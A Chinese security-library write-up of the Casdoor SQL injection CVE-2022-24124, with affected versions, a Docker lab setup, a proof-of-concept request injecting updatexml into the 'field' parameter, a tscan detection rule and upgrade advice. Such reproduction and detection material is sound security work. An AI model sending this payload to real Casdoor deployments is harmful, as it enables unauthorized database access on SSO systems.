Casdoor SQL注入漏洞(CVE-2022-24124)-漏洞文库小世界-安全文库-NGC660 安全实验室

Casdoor SQL注入漏洞(CVE-2022-24124)

一、漏洞详情

Casdoor 是一个基于 OAuth 2.0 / OIDC 的中心化的单点登录(SSO)身份验证平台。此漏洞属于Sql注入漏洞,在查询API 存在与字段和值参数相关的SQL 注入漏洞。

二、漏洞影响范围

Casdoor < Casdoor 1.13.1  //1.13.1版本之前均受影响

三、漏洞复现

拉取漏洞镜像

docker pull vulfocus/casdoor:1.13.0

m_163e35505d945bf089973693dae0a826_r

启动环境

m_e5ae7b75ecc18daf9f37cc4ae620d8cb_r

m_1c71df1bf7a3b81a5704f8c1db1468d9_r

poc

/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

m_15be9c682e69524963afe83ab510c04a_r

tscan poc

params: []
name: "1"
set: {}
rules:
- method: GET
  path: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)
  headers: {}
  body: ""
  search: ""
  followredirects: false
  expression: response.status==200 && response.body.bcontains(b"beego")
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""

四、漏洞处置建议

尽快升级到最新版本。
请登录后发表评论

    请登录后查看回复内容